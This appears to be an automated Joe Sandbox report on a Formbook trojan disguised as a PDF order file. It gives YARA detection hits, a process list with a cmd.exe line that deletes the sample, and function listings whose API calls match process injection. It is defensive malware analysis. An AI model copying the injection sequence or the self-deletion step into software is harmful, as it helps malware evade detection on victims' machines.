Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	08:38:43
Start date:	23/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:38:43
Start date:	23/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.7%
Total number of Nodes:	169
Total number of Limit Nodes:	7

Executed Functions

Function 05276630 Relevance: 1.8, Strings: 1, Instructions: 536
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Pphq, xrefs: 05276A81

Memory Dump Source

Source File: 00000000.00000002.2128896097.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5270000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: Pphq
API String ID: 0-882776299
Opcode ID: 659dddffa06707add495deb31b69ff71fcd108296c2ac1f93a3b5a67a623a126
Instruction ID: 1dfdcf13c668b79a731132ec389a10f454bc6d676eaee67b85d3fa4500d5ad6c
Opcode Fuzzy Hash: 659dddffa06707add495deb31b69ff71fcd108296c2ac1f93a3b5a67a623a126
Instruction Fuzzy Hash: 3C42D674A10719CFDB14DFA4C994A9DB7B2FF89300F2185A9E409AB365DB70AE85CF40

Function 05276640 Relevance: 1.8, Strings: 1, Instructions: 533
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Pphq, xrefs: 05276A81

Memory Dump Source

Source File: 00000000.00000002.2128896097.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5270000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: Pphq
API String ID: 0-882776299
Opcode ID: 8f1cbc489559321b99d6c0917f93b785317376e29de61910ea2346a0881565e7
Instruction ID: 824d129693a45ec0245adce16e226ecd40eb328d504e87385556937aa5faec7b
Opcode Fuzzy Hash: 8f1cbc489559321b99d6c0917f93b785317376e29de61910ea2346a0881565e7
Instruction Fuzzy Hash: FB42C734A11719CFDB14DFA4C994A9DB7B2FF89300F2085A9E409AB365DB70AE85CF50

Function 076149F8 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3aaa4af3de3e277f04aa5e1bab5b81293c45218dff741e604bb9a0c5f0cc576
Instruction ID: e62114b5832042e61163befd1f7c9ca3fc6a5d87f95a83ce693ed5abc5fac97b
Opcode Fuzzy Hash: d3aaa4af3de3e277f04aa5e1bab5b81293c45218dff741e604bb9a0c5f0cc576
Instruction Fuzzy Hash: A5C1ABB0B016858FDB19DB75C458BAEBBFAAF89700F18846DD1468B390CF35E801CB51

Function 07612CDC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f20b0b1afe8ba5498737da31fb5d77fbb3d045f9b52f14bfd23f97531a6676c1
Instruction ID: be7e5bef2d55993605f24ee7741ea9a942d74df81a78171ae2a7291caa2c4c47
Opcode Fuzzy Hash: f20b0b1afe8ba5498737da31fb5d77fbb3d045f9b52f14bfd23f97531a6676c1
Instruction Fuzzy Hash: EA212CB9919158CFCB24DF65D8987E8BBB4AF5B321F0860E6980FA7351DB305A85CF10

Function 076131ED Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30a5b2334041feb1c04b9d8702a9b577d515eadcc125f9242e4c1b89bad07c4a
Instruction ID: 73431b2ebd047bfcb9e6ec127f09cfce6fc18366086683cde02694887b4c61e8
Opcode Fuzzy Hash: 30a5b2334041feb1c04b9d8702a9b577d515eadcc125f9242e4c1b89bad07c4a
Instruction Fuzzy Hash: 98113DB9919158CFCB24DF55D8986F8BBB8FB5A311F0860E6D80FA6351CB305A86CF10

Function 07612C8B Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1559881b246f70da2d2607125afd3808c79ec26a447eab7d65386b7103dfca10
Instruction ID: 3ae4b66ecca0f08be1259862e040a09047daad3b1edbf02d7d7ed68e701b7bb7
Opcode Fuzzy Hash: 1559881b246f70da2d2607125afd3808c79ec26a447eab7d65386b7103dfca10
Instruction Fuzzy Hash: 080152B591D298CFCB20DF65D4582F8BFB8AB17311F0920E6D80F96352DB301A86CB15

Function 076133D8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d403a285b67e2357c39e3e23b27cb925e307313ee85728dc364fb0fdfb73e4
Instruction ID: 5405a31e6dddd3247ddf22f65ba6bdb80a57bd0877743c211036ec385cbd2ef4
Opcode Fuzzy Hash: 41d403a285b67e2357c39e3e23b27cb925e307313ee85728dc364fb0fdfb73e4
Instruction Fuzzy Hash: 10E04FB5D1E048CBCB109EA5A9981F4BBB8D747211F0930B5C50F97702D5315615CA25

Function 07610DD4 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07611016

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 60bcd42d1b51265a7056d09b3ed1f0f23e14c60016644b59263bde7a6eed332b
Instruction ID: e3bdc0618a519abada68dea690c05913298332e3e34d159f934c4c19a35b0a0c
Opcode Fuzzy Hash: 60bcd42d1b51265a7056d09b3ed1f0f23e14c60016644b59263bde7a6eed332b
Instruction Fuzzy Hash: 66917BB1D0025ACFDF24CF68C8457EDBBB2BF49310F18816AD80AA7254DB759985CF91

Function 07610DE0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07611016

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 806dbacb393706e012f29113578dc8ce4a16f70330d5993709281913cafddcc1
Instruction ID: 7271869c5bcab5b2c760fb29ac14c0d8d00b54d38ae30b784f0f4c684b9bd29a
Opcode Fuzzy Hash: 806dbacb393706e012f29113578dc8ce4a16f70330d5993709281913cafddcc1
Instruction Fuzzy Hash: CB916AB1D0025ACFDF24CF69C845BEDBBB2BF49310F18816AD809A7254DB749985CF91

Function 0107ADA8 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0107AFFE

Memory Dump Source

Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c75839523aef0e1129c0765e3ab918ef1c53cd4f5afb3583b5955740fd11a638
Instruction ID: d818aca73e95811fa9daa9e8d10c30787e845f13d8404ab0aae1621ef3a8cdec
Opcode Fuzzy Hash: c75839523aef0e1129c0765e3ab918ef1c53cd4f5afb3583b5955740fd11a638
Instruction Fuzzy Hash: B7713370A00B05CFEB65DF69D540B9ABBF1BF88300F04896DE48AD7A50DB34E849CB94

Function 010744B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010759C9

Memory Dump Source

Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: be0e667983b3bba0e89612ec1a117f7f0e1087d3f90bcb8a7702ce0f737a2856
Instruction ID: 871679ec3ea6f24c05bc7027d01ec30f16d1622ee404fe20bb98186bfb0ebc4c
Opcode Fuzzy Hash: be0e667983b3bba0e89612ec1a117f7f0e1087d3f90bcb8a7702ce0f737a2856
Instruction Fuzzy Hash: 4241DDB0C0071DCADB24DFA9C984BDEBBF5BF49304F60806AD448AB255DBB56946CF90

Function 0107590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 010759C9

Memory Dump Source

Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: cb1046310c8cbb23bfa77fdec85ddc91e2f6ee54ac0051248c80f4835f001038
Instruction ID: ae8729984cd1cccbfaa5cabb204ee48de3f9dd4856f4c46bde897f4702ce6354
Opcode Fuzzy Hash: cb1046310c8cbb23bfa77fdec85ddc91e2f6ee54ac0051248c80f4835f001038
Instruction Fuzzy Hash: 834111B0C0071DCADB24DFA9C884BCDBBF1BF49314F24816AD458AB295DB755986CF90

Function 05274040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05274101

Memory Dump Source

Source File: 00000000.00000002.2128896097.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5270000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 978a0e320f00ea178ce50ff902c5ee831f3c125274f298957bff7738b4dcf11b
Instruction ID: 7839396e4f0b464987e9ea027dffe110cfcc89e2ed57781c7907770e74a6c256
Opcode Fuzzy Hash: 978a0e320f00ea178ce50ff902c5ee831f3c125274f298957bff7738b4dcf11b
Instruction Fuzzy Hash: C64137B4A10309CFDB14DF99C848AAABBF6FF88314F25C459D519AB361D375A841CFA0

Function 07610B51 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07610BE8

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b4a1ba5469bdcef09309bbdbbbfbf7570bc43847a445f0bec3efdd2bee8dffed
Instruction ID: 4ec5a8dca4770384f32678d4957f163d9f33d9fae399dd1c5b9efa28dcd772b7
Opcode Fuzzy Hash: b4a1ba5469bdcef09309bbdbbbfbf7570bc43847a445f0bec3efdd2bee8dffed
Instruction Fuzzy Hash: 2F2126B59003199FCF10DFAAC985BEEBBF5FF48314F148429E919A7240D7799944CBA0

Function 07610B58 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07610BE8

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 63f8e87816fd64a4f528f5140ccea4818b44ac20bbccb0c758364612c3edbeda
Instruction ID: c275b9170ee25fc9a1d19c24175805675df88d0fd347be4cd5510aa966ac2fb1
Opcode Fuzzy Hash: 63f8e87816fd64a4f528f5140ccea4818b44ac20bbccb0c758364612c3edbeda
Instruction Fuzzy Hash: 382127B59003099FCF10DFAAC985BEEBBF5FF48310F148429E919A7240C7799944CBA0

Function 0107D27C Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0107D656,?,?,?,?,?), ref: 0107D717

Memory Dump Source

Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bccc769173694cf9cb184cf16456252190d39a371b450296c6ddf12bc5201d78
Instruction ID: 3216a92f49a9065696a260d3a5df061cd5b232e17bda7823feeaddd2f61aa5b6
Opcode Fuzzy Hash: bccc769173694cf9cb184cf16456252190d39a371b450296c6ddf12bc5201d78
Instruction Fuzzy Hash: D421D4B5D002489FDB10DF9AD584AEEBBF5FF48310F14841AE958B7250D378A950CFA5

Function 076109B9 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07610A3E

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a48d4bb58665476cb9a7f715eaf733f8b591f9322332c85b77e79aded2511d53
Instruction ID: c0fb278a4b58d6cf3f4bbded06c1be52107b2b6c4ed673f4aa0e6e9c7506e19c
Opcode Fuzzy Hash: a48d4bb58665476cb9a7f715eaf733f8b591f9322332c85b77e79aded2511d53
Instruction Fuzzy Hash: 312138B1D003099FDB10DFAAC485BEEBBF4EF88314F148429D519A7241CB789985CFA1

Function 07610C40 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07610CC8

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0f878ac7a8f56840510f5e79a68a32b49fa663b893012112d4296dd502d5ebb7
Instruction ID: 017506606251703bb6c2f4c9079eb226fb12a440a2e0c6cda5055368e3662c27
Opcode Fuzzy Hash: 0f878ac7a8f56840510f5e79a68a32b49fa663b893012112d4296dd502d5ebb7
Instruction Fuzzy Hash: 352128B5C002599FCF10DFA9C945AEEBBF5FF48320F14842AE559A7250D7389544CFA0

Function 07610C48 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07610CC8

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: af336ec9baccc9d733ec4993a272b53b0cd6a1c17bb3b0d5aeee10dfac93b96b
Instruction ID: cba05a6689aadc94389eb4fd6172666dcb3dd5d3ce2990a101b871f82735a7c8
Opcode Fuzzy Hash: af336ec9baccc9d733ec4993a272b53b0cd6a1c17bb3b0d5aeee10dfac93b96b
Instruction Fuzzy Hash: 1721E4B18002599FCB10DFAAC985AEEBBF5FF48310F54842AE519A7250C7789944CFA1

Function 076109C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07610A3E

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e61c1ee2bc3340aae0156171cc2b5ada501a40b20b396a1223f025c141317e06
Instruction ID: 1c21b58e20f19d2926ea5391183dd6f530cd055f0ba12a31e4d2a585acd448ca
Opcode Fuzzy Hash: e61c1ee2bc3340aae0156171cc2b5ada501a40b20b396a1223f025c141317e06
Instruction Fuzzy Hash: 492129B5D003099FDB10DFAAC585BEEBBF4EF88314F148429D519A7241CB789984CFA1

Function 0107D689 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0107D656,?,?,?,?,?), ref: 0107D717

Memory Dump Source

Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d51bb231a7e7c49d4954118b3c6e99bbbe37ade4c31275ea804ff7eff00da9cd
Instruction ID: 92bc2defca788a75cc844c58e2a6ce3f9b840e72f07a4f9a7e34848e8f09c3a9
Opcode Fuzzy Hash: d51bb231a7e7c49d4954118b3c6e99bbbe37ade4c31275ea804ff7eff00da9cd
Instruction Fuzzy Hash: 1221E0B5D002489FDB10CFAAD584AEEBFF5FF48310F14841AE958A3250D378A954CFA5

Function 07610A91 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07610B06

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 877c19b63bb8edd11eb3eb3079f460b5f7c3ea7b48051728cd6717bee943a4a0
Instruction ID: ed1a150254203dbb091cf00af97cd33ddcc207d22642266b49bcc3a0496b9d34
Opcode Fuzzy Hash: 877c19b63bb8edd11eb3eb3079f460b5f7c3ea7b48051728cd6717bee943a4a0
Instruction Fuzzy Hash: 561126B29002499FCF10DFAAC945BEEBFF5EF88324F148419E519A7254C779A940CFA1

Function 07610A98 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07610B06

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 952ac11acd4ce6f45a919de679554322dca91fedae75d12a29a92eb0bcdac9ad
Instruction ID: 85380d93fe7254f7212994dd3ffa2212749a780beba22038a46afc86f3cfa2b3
Opcode Fuzzy Hash: 952ac11acd4ce6f45a919de679554322dca91fedae75d12a29a92eb0bcdac9ad
Instruction Fuzzy Hash: A51137B19002499FCF10DFAAC944BEEBFF5EF88320F148419E519A7250C779A540CFA0

Function 07610908 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07610972

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: be5ca1a912d6280d3a1ce520ef7f89309f5242d1b9b9be1a5fc9c2779df20265
Instruction ID: 741075eaba2a44b36b418a5a7e74773be903f8f8349783625cbdd1acdc6115d3
Opcode Fuzzy Hash: be5ca1a912d6280d3a1ce520ef7f89309f5242d1b9b9be1a5fc9c2779df20265
Instruction Fuzzy Hash: 801146B1C002498BDB20DFAAC4457EEFBF4EF88324F14881AD519A7240CB39A940CBA1

Function 07610910 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07610972

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9999500f0388a38cdd1543ad0f1171774f85ec6329447af302ca84ebd024b4a7
Instruction ID: 26ca206801222eb5eab3cdba154eb651a6fd20fb3c798101a231e0c47a0bb7fb
Opcode Fuzzy Hash: 9999500f0388a38cdd1543ad0f1171774f85ec6329447af302ca84ebd024b4a7
Instruction Fuzzy Hash: 4F113AB1D003498FDB20DFAAC4457AEFBF5EF88320F148819D519A7250CB79A944CFA0

Function 0107AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0107AFFE

Memory Dump Source

Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 20fd750adc03e9a068252baa27b9319caaf3be33f58e357ca99d7da5ebe6e156
Instruction ID: ec261005c5d1f207492aaff1d1e5e00efab536756a1edd890c7e3a21e50c8abc
Opcode Fuzzy Hash: 20fd750adc03e9a068252baa27b9319caaf3be33f58e357ca99d7da5ebe6e156
Instruction Fuzzy Hash: B2110FB5C002498FDB20DF9AC444A9EFBF4AF88314F14845AD568A7210D379A545CFA5

Function 07613EFB Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07613F5D

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b4cdb2fc73fbee9c5ace4097121d5e7d196f5637e9c6f8c27bc58455ede4cfc0
Instruction ID: c3f2f60794c4ff94f6e456cc33fd5bbaa62b20aff7916ce99fae665524c6b1b6
Opcode Fuzzy Hash: b4cdb2fc73fbee9c5ace4097121d5e7d196f5637e9c6f8c27bc58455ede4cfc0
Instruction Fuzzy Hash: 6011D3B58003499FDB10DF9AD889BDEBFF8EB48310F14845AE519A7340D379A944CFA5

Function 07613F00 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07613F5D

Memory Dump Source

Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b82d60c928d0bc54cc6185c5e16e29b947b50df40590f0a98156422521ccdb4c
Instruction ID: 274ddcab43575dc8f9b9ec8efe1e99b6ac0e66737b1f3585c0eec7c1d38b04ab
Opcode Fuzzy Hash: b82d60c928d0bc54cc6185c5e16e29b947b50df40590f0a98156422521ccdb4c
Instruction Fuzzy Hash: B111D0B58003499FDB10DF9AD889BDEBBF8EB48320F14845AE519A7340C379A944CFA5

Function 00F9D1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120835000.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f9d000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dd9587e3ef93c09e01b46b74c1d65c05e47a2652fbb9b4e8ee6809ffa6b5f4e
Instruction ID: 707ae764f64208f533f746369fa49ca3232316c2f920ae6492139ca53b83e12b
Opcode Fuzzy Hash: 4dd9587e3ef93c09e01b46b74c1d65c05e47a2652fbb9b4e8ee6809ffa6b5f4e
Instruction Fuzzy Hash: 75210372504200DFEF05DF54D9C0B26BF65FB88320F30C569E9090B256C33AD816EBA2

Function 00F9D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120835000.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f9d000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cafb2a728b4a7abdd714e9a180246600dde18d7ddb1ca692c19db71b45e1de2
Instruction ID: d33d770529746cfcb3c2c0d34964cfb2813db901e03e1fbf1a02415277dc5e8c
Opcode Fuzzy Hash: 7cafb2a728b4a7abdd714e9a180246600dde18d7ddb1ca692c19db71b45e1de2
Instruction Fuzzy Hash: 1B21F472900244DFEF15DF14D980B26BF65FB98328F34C569D9090B256C336D816E7A2

Function 00FBD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121022723.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fbd000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8348e615cfc387e934f7b5dd8aa3c543186b92e8609c6e2cce4a6fea7f7276a
Instruction ID: 7d622b513b66d0b280060a0b83ffd148d1ed58861a93f17cb97ab3963a8d8ef9
Opcode Fuzzy Hash: a8348e615cfc387e934f7b5dd8aa3c543186b92e8609c6e2cce4a6fea7f7276a
